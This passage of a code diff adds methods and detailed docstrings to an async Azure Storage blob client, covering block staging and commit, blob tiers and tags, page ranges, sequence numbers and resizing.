12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :rtype: None + """ + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if standard_blob_tier is None: + raise ValueError("A StandardBlobTier must be specified") + try: + await self._client.blob.set_tier( + tier=standard_blob_tier, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + lease_access_conditions=access_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def stage_block( + self, block_id, # type: str + data, # type: Union[Iterable[AnyStr], IO[AnyStr]] + length=None, # type: Optional[int] + **kwargs + ): + # type: (...) -> None + """Creates a new block to be committed as part of a blob. + + :param str block_id: A string value that identifies the block. + The string should be less than or equal to 64 bytes in size. + For a given blob, the block_id must be the same size for each block. + :param data: The blob data. + :param int length: Size of the block. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. 
The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword str encoding: + Defaults to UTF-8. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + """ + options = self._stage_block_options( + block_id, + data, + length=length, + **kwargs) + try: + return await self._client.block_blob.stage_block(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def stage_block_from_url( + self, block_id, # type: Union[str, int] + source_url, # type: str + source_offset=None, # type: Optional[int] + source_length=None, # type: Optional[int] + source_content_md5=None, # type: Optional[Union[bytes, bytearray]] + **kwargs + ): + # type: (...) -> None + """Creates a new block to be committed as part of a blob where + the contents are read from a URL. + + :param str block_id: A string value that identifies the block. + The string should be less than or equal to 64 bytes in size. + For a given blob, the block_id must be the same size for each block. + :param str source_url: The URL. + :param int source_offset: + Start of byte range to use for the block. + Must be set if source length is provided. + :param int source_length: The size of the block in bytes. + :param bytearray source_content_md5: + Specify the md5 calculated for the range of + bytes that must be read from the copy source. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. 
If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + :rtype: None + """ + options = self._stage_block_from_url_options( + block_id, + source_url=self._encode_source_url(source_url), + source_offset=source_offset, + source_length=source_length, + source_content_md5=source_content_md5, + **kwargs) + try: + return await self._client.block_blob.stage_block_from_url(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def get_block_list(self, block_list_type="committed", **kwargs): + # type: (Optional[str], Any) -> Tuple[List[BlobBlock], List[BlobBlock]] + """The Get Block List operation retrieves the list of blocks that have + been uploaded as part of a block blob. + + :param str block_list_type: + Specifies whether to return the list of committed + blocks, the list of uncommitted blocks, or both lists together. + Possible values include: 'committed', 'uncommitted', 'all' + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: A tuple of two lists - committed and uncommitted blocks + :rtype: tuple(list(~azure.storage.blob.BlobBlock), list(~azure.storage.blob.BlobBlock)) + """ + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + try: + blocks = await self._client.block_blob.get_block_list( + list_type=block_list_type, + snapshot=self.snapshot, + timeout=kwargs.pop('timeout', None), + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + return self._get_block_list_result(blocks) + + @distributed_trace_async + async def commit_block_list( # type: ignore + self, block_list, # type: List[BlobBlock] + content_settings=None, # type: Optional[ContentSettings] + metadata=None, # type: Optional[Dict[str, str]] + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime]] + """The Commit Block List operation writes a blob by specifying the list of + block IDs that make up the blob. + + :param list block_list: + List of BlobBlock objects. + :param ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict[str, str] + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. 
+ Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool validate_content: + If true, calculates an MD5 hash of the page content. The storage + service checks the hash of the content that has arrived + with the hash that was sent. This is primarily valuable for detecting + bitflips on the wire if using http instead of https, as https (the default), + will already validate. Note that this MD5 hash is not stored with the + blob. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. 
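Putting the two block operations together, a hedged sketch of a manual block upload (placeholder data; block IDs must be Base64 strings of equal length, hence the encoding step; `blob` as in the earlier sketches):

    import base64
    from azure.storage.blob import BlobBlock

    async with blob:
        block_id = base64.b64encode(b"block-000000").decode()
        await blob.stage_block(block_id, b"hello, world")
        # Nothing is readable until the block list is committed.
        await blob.commit_block_list([BlobBlock(block_id=block_id)])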
+ :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._commit_block_list_options( + block_list, + content_settings=content_settings, + metadata=metadata, + **kwargs) + try: + return await self._client.block_blob.commit_block_list(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def set_premium_page_blob_tier(self, premium_page_blob_tier, **kwargs): + # type: (Union[str, PremiumPageBlobTier], **Any) -> None + """Sets the page blob tier on the blob. This API is only supported for page blobs on premium accounts. + + :param premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :type premium_page_blob_tier: ~azure.storage.blob.PremiumPageBlobTier + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :rtype: None + """ + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if premium_page_blob_tier is None: + raise ValueError("A PremiumPageBlobTier must be specified") + try: + await self._client.blob.set_tier( + tier=premium_page_blob_tier, + timeout=kwargs.pop('timeout', None), + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def set_blob_tags(self, tags=None, **kwargs): + # type: (Optional[Dict[str, str]], **Any) -> Dict[str, Any] + """The Set Tags operation enables users to set tags on a blob or specific blob version, but not snapshot. + Each call to this operation replaces all existing tags attached to the blob. To remove all + tags from the blob, call this operation with no tags set. + + .. versionadded:: 12.4.0 + This operation was introduced in API version '2019-12-12'. + + :param tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + :type tags: dict(str, str) + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to set tags on. + :keyword bool validate_content: + If true, calculates an MD5 hash of the tags content. The storage + service checks the hash of the content that has arrived + with the hash that was sent. This is primarily valuable for detecting + bitflips on the wire if using http instead of https, as https (the default), + will already validate. Note that this MD5 hash is not stored with the + blob. 
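A round-trip sketch for the tag operations documented here and just below (hedged placeholder values; `blob` as in the earlier sketches):

    async with blob:
        await blob.set_blob_tags({"project": "alpha", "stage": "raw"})
        tags = await blob.get_blob_tags()
        # Tags were replaced wholesale, so exactly these two keys exist.
        assert tags == {"project": "alpha", "stage": "raw"}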
+ :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified) + :rtype: Dict[str, Any] + """ + options = self._set_blob_tags_options(tags=tags, **kwargs) + try: + return await self._client.blob.set_tags(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def get_blob_tags(self, **kwargs): + # type: (**Any) -> Dict[str, str] + """The Get Tags operation enables users to get tags on a blob or specific blob version, but not snapshot. + + .. versionadded:: 12.4.0 + This operation was introduced in API version '2019-12-12'. + + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to get tags for. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Key value pairs of blob tags. + :rtype: Dict[str, str] + """ + options = self._get_blob_tags_options(**kwargs) + try: + _, tags = await self._client.blob.get_tags(**options) + return parse_tags(tags) # pylint: disable=protected-access + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def get_page_ranges( # type: ignore + self, offset=None, # type: Optional[int] + length=None, # type: Optional[int] + previous_snapshot_diff=None, # type: Optional[Union[str, Dict[str, Any]]] + **kwargs + ): + # type: (...) -> Tuple[List[Dict[str, int]], List[Dict[str, int]]] + """DEPRECATED: Returns the list of valid page ranges for a Page Blob or snapshot + of a page blob. + + :param int offset: + Start of byte range to use for getting valid page ranges. + If no length is given, all bytes after the offset will be searched. + Pages must be aligned with 512-byte boundaries, the start offset + must be a multiple of 512 and the length must be a multiple of + 512. + :param int length: + Number of bytes to use for getting valid page ranges. + If length is given, offset must be provided. + This range will return valid page ranges from the offset start up to + the specified length. + Pages must be aligned with 512-byte boundaries, the start offset + must be a multiple of 512 and the length must be a multiple of + 512. + :param str previous_snapshot_diff: + The snapshot diff parameter that contains an opaque DateTime value that + specifies a previous blob snapshot to be compared + against a more recent snapshot or the current blob. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. 
+ If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: + A tuple of two lists of page ranges as dictionaries with 'start' and 'end' keys. + The first element is the filled page ranges, the second element is the cleared page ranges. + :rtype: tuple(list(dict(str, int)), list(dict(str, int))) + """ + warnings.warn( + "get_page_ranges is deprecated, use list_page_ranges instead", + DeprecationWarning + ) + + options = self._get_page_ranges_options( + offset=offset, + length=length, + previous_snapshot_diff=previous_snapshot_diff, + **kwargs) + try: + if previous_snapshot_diff: + ranges = await self._client.page_blob.get_page_ranges_diff(**options) + else: + ranges = await self._client.page_blob.get_page_ranges(**options) + except HttpResponseError as error: + process_storage_error(error) + return get_page_ranges_result(ranges) + + @distributed_trace + def list_page_ranges( + self, + *, + offset: Optional[int] = None, + length: Optional[int] = None, + previous_snapshot: Optional[Union[str, Dict[str, Any]]] = None, + **kwargs: Any + ) -> AsyncItemPaged[PageRange]: + """Returns the list of valid page ranges for a Page Blob or snapshot + of a page blob. If `previous_snapshot` is specified, the result will be + a diff of changes between the target blob and the previous snapshot. + + :keyword int offset: + Start of byte range to use for getting valid page ranges. + If no length is given, all bytes after the offset will be searched. + Pages must be aligned with 512-byte boundaries, the start offset + must be a multiple of 512 and the length must be a multiple of + 512. + :keyword int length: + Number of bytes to use for getting valid page ranges. + If length is given, offset must be provided. + This range will return valid page ranges from the offset start up to + the specified length. + Pages must be aligned with 512-byte boundaries, the start offset + must be a multiple of 512 and the length must be a multiple of + 512. + :keyword previous_snapshot: + A snapshot value that specifies that the response will contain only pages that were changed + between target blob and previous snapshot. Changed pages include both updated and cleared + pages. The target blob may be a snapshot, as long as the snapshot specified by `previous_snapshot` + is the older of the two. 
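A paging sketch for this newer API (hedged: `blob` as in the earlier sketches; `PageRange` exposes `start`/`end` byte offsets):

    async with blob:
        async for page_range in blob.list_page_ranges():
            print(page_range.start, page_range.end)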
+    @distributed_trace
+    def list_page_ranges(
+        self,
+        *,
+        offset: Optional[int] = None,
+        length: Optional[int] = None,
+        previous_snapshot: Optional[Union[str, Dict[str, Any]]] = None,
+        **kwargs: Any
+    ) -> AsyncItemPaged[PageRange]:
+        """Returns the list of valid page ranges for a Page Blob or snapshot
+        of a page blob. If `previous_snapshot` is specified, the result will be
+        a diff of changes between the target blob and the previous snapshot.
+
+        :keyword int offset:
+            Start of byte range to use for getting valid page ranges.
+            If no length is given, all bytes after the offset will be searched.
+            Pages must be aligned with 512-byte boundaries, the start offset
+            must be a modulus of 512 and the length must be a modulus of
+            512.
+        :keyword int length:
+            Number of bytes to use for getting valid page ranges.
+            If length is given, offset must be provided.
+            This range will return valid page ranges from the offset start up to
+            the specified length.
+            Pages must be aligned with 512-byte boundaries, the start offset
+            must be a modulus of 512 and the length must be a modulus of
+            512.
+        :keyword previous_snapshot:
+            A snapshot value that specifies that the response will contain only pages that were changed
+            between target blob and previous snapshot. Changed pages include both updated and cleared
+            pages. The target blob may be a snapshot, as long as the snapshot specified by `previous_snapshot`
+            is the older of the two.
+        :paramtype previous_snapshot: str or Dict[str, Any]
+        :keyword lease:
+            Required if the blob has an active lease. Value can be a BlobLeaseClient object
+            or the lease ID as a string.
+        :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str
+        :keyword ~datetime.datetime if_modified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only
+            if the resource has been modified since the specified time.
+        :keyword ~datetime.datetime if_unmodified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only if
+            the resource has not been modified since the specified date/time.
+        :keyword str etag:
+            An ETag value, or the wildcard character (*). Used to check if the resource has changed,
+            and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition:
+            The match condition to use upon the etag.
+        :keyword str if_tags_match_condition:
+            Specify a SQL where clause on blob tags to operate only on blobs with a matching value.
+            e.g. ``\"\\\"tagname\\\"='my tag'\"``
+
+            .. versionadded:: 12.4.0
+
+        :keyword int results_per_page:
+            The maximum number of page ranges to retrieve per API call.
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: An iterable (auto-paging) of PageRange.
+        :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.storage.blob.PageRange]
+        """
+        results_per_page = kwargs.pop('results_per_page', None)
+        options = self._get_page_ranges_options(
+            offset=offset,
+            length=length,
+            previous_snapshot_diff=previous_snapshot,
+            **kwargs)
+
+        if previous_snapshot:
+            command = partial(
+                self._client.page_blob.get_page_ranges_diff,
+                **options)
+        else:
+            command = partial(
+                self._client.page_blob.get_page_ranges,
+                **options)
+        return AsyncItemPaged(
+            command, results_per_page=results_per_page,
+            page_iterator_class=PageRangePaged)
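The `previous_snapshot` diff path is the least obvious part of this API, so here is a hedged, self-contained sketch (editorial addition; placeholders throughout, and it assumes `PageRange.cleared` is available in this SDK version, as the paging model above suggests):

```python
import asyncio

from azure.storage.blob.aio import BlobClient


async def main():
    blob = BlobClient.from_connection_string(
        "<connection-string>", container_name="demo", blob_name="disk.vhd")
    async with blob:
        await blob.create_page_blob(1024)        # two 512-byte pages
        snapshot = await blob.create_snapshot()  # baseline for the diff
        await blob.upload_page(b"\xff" * 512, offset=0, length=512)

        # Only the first page should come back, flagged as filled (not cleared).
        async for page_range in blob.list_page_ranges(previous_snapshot=snapshot):
            print(page_range.start, page_range.end, page_range.cleared)

asyncio.run(main())
```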
+    @distributed_trace_async
+    async def get_page_range_diff_for_managed_disk(
+            self, previous_snapshot_url, # type: str
+            offset=None, # type: Optional[int]
+            length=None, # type: Optional[int]
+            **kwargs
+        ):
+        # type: (...) -> Tuple[List[Dict[str, int]], List[Dict[str, int]]]
+        """Returns the list of valid page ranges for a managed disk or snapshot.
+
+        .. note::
+            This operation is only available for managed disk accounts.
+
+        .. versionadded:: 12.2.0
+            This operation was introduced in API version '2019-07-07'.
+
+        :param str previous_snapshot_url:
+            Specifies the URL of a previous snapshot of the managed disk.
+            The response will only contain pages that were changed between the target blob and
+            its previous snapshot.
+        :param int offset:
+            Start of byte range to use for getting valid page ranges.
+            If no length is given, all bytes after the offset will be searched.
+            Pages must be aligned with 512-byte boundaries, the start offset
+            must be a modulus of 512 and the length must be a modulus of
+            512.
+        :param int length:
+            Number of bytes to use for getting valid page ranges.
+            If length is given, offset must be provided.
+            This range will return valid page ranges from the offset start up to
+            the specified length.
+            Pages must be aligned with 512-byte boundaries, the start offset
+            must be a modulus of 512 and the length must be a modulus of
+            512.
+        :keyword lease:
+            Required if the blob has an active lease. Value can be a BlobLeaseClient object
+            or the lease ID as a string.
+        :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str
+        :keyword ~datetime.datetime if_modified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only
+            if the resource has been modified since the specified time.
+        :keyword ~datetime.datetime if_unmodified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only if
+            the resource has not been modified since the specified date/time.
+        :keyword str etag:
+            An ETag value, or the wildcard character (*). Used to check if the resource has changed,
+            and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition:
+            The match condition to use upon the etag.
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns:
+            A tuple of two lists of page ranges as dictionaries with 'start' and 'end' keys.
+            The first element is the filled page ranges, the second element is the cleared page ranges.
+        :rtype: tuple(list(dict(str, int)), list(dict(str, int)))
+        """
+        options = self._get_page_ranges_options(
+            offset=offset,
+            length=length,
+            prev_snapshot_url=previous_snapshot_url,
+            **kwargs)
+        try:
+            ranges = await self._client.page_blob.get_page_ranges_diff(**options)
+        except HttpResponseError as error:
+            process_storage_error(error)
+        return get_page_ranges_result(ranges)
+
+    @distributed_trace_async
+    async def set_sequence_number( # type: ignore
+            self, sequence_number_action, # type: Union[str, SequenceNumberAction]
+            sequence_number=None, # type: Optional[str]
+            **kwargs
+        ):
+        # type: (...) -> Dict[str, Union[str, datetime]]
+        """Sets the blob sequence number.
+
+        :param str sequence_number_action:
+            This property indicates how the service should modify the blob's sequence
+            number. See :class:`~azure.storage.blob.SequenceNumberAction` for more information.
+        :param str sequence_number:
+            This property sets the blob's sequence number. The sequence number is a
+            user-controlled property that you can use to track requests and manage
+            concurrency issues.
+        :keyword lease:
+            Required if the blob has an active lease. Value can be a BlobLeaseClient object
+            or the lease ID as a string.
+        :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str
+        :keyword ~datetime.datetime if_modified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only
+            if the resource has been modified since the specified time.
+        :keyword ~datetime.datetime if_unmodified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+ If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._set_sequence_number_options( + sequence_number_action, sequence_number=sequence_number, **kwargs) + try: + return await self._client.page_blob.update_sequence_number(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def resize_blob(self, size, **kwargs): + # type: (int, Any) -> Dict[str, Union[str, datetime]] + """Resizes a page blob to the specified size. + + If the specified value is less than the current size of the blob, + then all pages above the specified value are cleared. + + :param int size: + Size used to resize blob. Maximum size for a page blob is up to 1 TB. + The page blob size must be aligned to a 512-byte boundary. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). 
+ :rtype: dict(str, Any) + """ + options = self._resize_blob_options(size, **kwargs) + try: + return await self._client.page_blob.resize(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def upload_page( # type: ignore + self, page, # type: bytes + offset, # type: int + length, # type: int + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime]] + """The Upload Pages operation writes a range of pages to a page blob. + + :param bytes page: + Content of the page. + :param int offset: + Start of byte range to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword bool validate_content: + If true, calculates an MD5 hash of the page content. The storage + service checks the hash of the content that has arrived + with the hash that was sent. This is primarily valuable for detecting + bitflips on the wire if using http instead of https, as https (the default), + will already validate. Note that this MD5 hash is not stored with the + blob. + :keyword int if_sequence_number_lte: + If the blob's sequence number is less than or equal to + the specified value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_lt: + If the blob's sequence number is less than the specified + value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_eq: + If the blob's sequence number is equal to the specified + value, the request proceeds; otherwise it fails. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. 
